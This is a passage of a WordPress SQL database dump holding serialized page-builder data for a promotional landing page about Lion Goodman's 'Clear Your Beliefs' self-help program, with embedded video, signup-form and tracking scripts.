src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1155, 1643, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -108px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1569:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 18px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: 10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul style="margin-left: 18px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2822:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1156, 1644, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1569:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 18px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: 10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul style="margin-left: 18px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2822:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1157, 1645, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:660:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" 